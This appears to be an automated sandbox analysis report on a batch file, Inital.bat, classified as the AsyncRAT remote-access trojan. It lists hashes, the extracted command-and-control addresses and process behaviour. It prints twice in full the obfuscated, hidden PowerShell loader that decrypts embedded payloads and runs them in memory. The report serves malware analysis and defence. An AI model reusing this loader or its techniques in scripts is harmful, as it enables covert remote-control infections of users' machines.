Resubmissions
23-05-2024 05:33
240523-f8yy7afc8w 1022-05-2024 19:39
240522-yc9d6adh9s 1022-05-2024 19:09
240522-xtyhjsdb21 1022-05-2024 19:06
240522-xscvfsda5y 1022-05-2024 16:28
240522-tyxj9shb7z 10Analysis
-
max time kernel
85s -
max time network
86s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 19:06
Static task
static1
General
-
Target
Inital.bat
-
Size
63KB
-
MD5
e9319ac7284b6bbadf0200fee286b6c1
-
SHA1
51c30382aa103118937f1a9bf453a8345febafb4
-
SHA256
09d4308c18ecece489a51b7837968bcfc6c1273d83f5c83614bbdd119ccf6961
-
SHA512
73e349b61c285cdb3cfdf41ae9ba166cc0f8e5c7b989bf744f9aa8433baf41ea3a01b46fa9a88cc97fa4ca5d80f57a9dbd8fea631a164566c9e95632c9f3404b
-
SSDEEP
1536:Z6e+aDqc6V/xOtoqfF4OycI/k0xqAD/xtM:Z6aDqpVuoqKL5fkAvM
Malware Config
Extracted
asyncrat
0.5.8
RATED
147.185.221.17:25565
147.185.221.17:37531
Dudee4vQEqBD
-
delay
3
-
install
false
-
install_file
AnticheatBiner.exe
-
install_folder
%AppData%
Signatures
-
Async RAT payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1772-24-0x00000000074D0000-0x00000000074E2000-memory.dmp family_asyncrat behavioral1/memory/2960-43-0x00000000069A0000-0x00000000069B2000-memory.dmp family_asyncrat -
Blocklisted process makes network request 16 IoCs
Processes:
powershell.exeflow pid process 19 1772 powershell.exe 27 1772 powershell.exe 29 1772 powershell.exe 31 1772 powershell.exe 32 1772 powershell.exe 33 1772 powershell.exe 44 1772 powershell.exe 45 1772 powershell.exe 46 1772 powershell.exe 47 1772 powershell.exe 49 1772 powershell.exe 51 1772 powershell.exe 61 1772 powershell.exe 62 1772 powershell.exe 63 1772 powershell.exe 64 1772 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 1772 powershell.exe 2960 powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 1772 powershell.exe 1772 powershell.exe 2960 powershell.exe 2960 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1772 powershell.exe Token: SeDebugPrivilege 2960 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 4460 wrote to memory of 1772 4460 cmd.exe powershell.exe PID 4460 wrote to memory of 1772 4460 cmd.exe powershell.exe PID 4460 wrote to memory of 1772 4460 cmd.exe powershell.exe PID 1000 wrote to memory of 2960 1000 cmd.exe powershell.exe PID 1000 wrote to memory of 2960 1000 cmd.exe powershell.exe PID 1000 wrote to memory of 2960 1000 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Inital.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rQsZbBPOPJCvxNhL0LUES/xBoGdJPo5xjQuRz/WAY2Y='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DjbA3otpI3NZoCoqJZkIpQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XrWyO=New-Object System.IO.MemoryStream(,$param_var); $udTvC=New-Object System.IO.MemoryStream; $DGCBl=New-Object System.IO.Compression.GZipStream($XrWyO, [IO.Compression.CompressionMode]::Decompress); $DGCBl.CopyTo($udTvC); $DGCBl.Dispose(); $XrWyO.Dispose(); $udTvC.Dispose(); $udTvC.ToArray();}function execute_function($param_var,$param2_var){ $ILwNn=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XDsjo=$ILwNn.EntryPoint; $XDsjo.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Inital.bat';$AUAcT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Inital.bat').Split([Environment]::NewLine);foreach ($RmJpd in $AUAcT) { if ($RmJpd.StartsWith(':: ')) { $jmZjY=$RmJpd.Substring(3); break; }}$payloads_var=[string[]]$jmZjY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Inital.bat" "1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rQsZbBPOPJCvxNhL0LUES/xBoGdJPo5xjQuRz/WAY2Y='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DjbA3otpI3NZoCoqJZkIpQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XrWyO=New-Object System.IO.MemoryStream(,$param_var); $udTvC=New-Object System.IO.MemoryStream; $DGCBl=New-Object System.IO.Compression.GZipStream($XrWyO, [IO.Compression.CompressionMode]::Decompress); $DGCBl.CopyTo($udTvC); $DGCBl.Dispose(); $XrWyO.Dispose(); $udTvC.Dispose(); $udTvC.ToArray();}function execute_function($param_var,$param2_var){ $ILwNn=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XDsjo=$ILwNn.EntryPoint; $XDsjo.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Inital.bat';$AUAcT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Inital.bat').Split([Environment]::NewLine);foreach ($RmJpd in $AUAcT) { if ($RmJpd.StartsWith(':: ')) { $jmZjY=$RmJpd.Substring(3); break; }}$payloads_var=[string[]]$jmZjY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f1mzw1cf.4xv.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/1772-20-0x0000000007B50000-0x00000000081CA000-memory.dmpFilesize
6.5MB
-
memory/1772-4-0x00000000750B0000-0x0000000075860000-memory.dmpFilesize
7.7MB
-
memory/1772-21-0x00000000068B0000-0x00000000068CA000-memory.dmpFilesize
104KB
-
memory/1772-5-0x0000000005320000-0x0000000005342000-memory.dmpFilesize
136KB
-
memory/1772-7-0x0000000005DB0000-0x0000000005E16000-memory.dmpFilesize
408KB
-
memory/1772-6-0x0000000005D40000-0x0000000005DA6000-memory.dmpFilesize
408KB
-
memory/1772-2-0x00000000750B0000-0x0000000075860000-memory.dmpFilesize
7.7MB
-
memory/1772-17-0x0000000005E20000-0x0000000006174000-memory.dmpFilesize
3.3MB
-
memory/1772-22-0x00000000068F0000-0x00000000068F8000-memory.dmpFilesize
32KB
-
memory/1772-19-0x0000000006320000-0x000000000636C000-memory.dmpFilesize
304KB
-
memory/1772-0-0x00000000750BE000-0x00000000750BF000-memory.dmpFilesize
4KB
-
memory/1772-3-0x00000000054F0000-0x0000000005B18000-memory.dmpFilesize
6.2MB
-
memory/1772-18-0x00000000062F0000-0x000000000630E000-memory.dmpFilesize
120KB
-
memory/1772-24-0x00000000074D0000-0x00000000074E2000-memory.dmpFilesize
72KB
-
memory/1772-23-0x0000000006900000-0x000000000690E000-memory.dmpFilesize
56KB
-
memory/1772-28-0x00000000750BE000-0x00000000750BF000-memory.dmpFilesize
4KB
-
memory/1772-29-0x00000000750B0000-0x0000000075860000-memory.dmpFilesize
7.7MB
-
memory/1772-30-0x00000000750B0000-0x0000000075860000-memory.dmpFilesize
7.7MB
-
memory/1772-1-0x0000000002E10000-0x0000000002E46000-memory.dmpFilesize
216KB
-
memory/2960-32-0x00000000750B0000-0x0000000075860000-memory.dmpFilesize
7.7MB
-
memory/2960-31-0x00000000750B0000-0x0000000075860000-memory.dmpFilesize
7.7MB
-
memory/2960-43-0x00000000069A0000-0x00000000069B2000-memory.dmpFilesize
72KB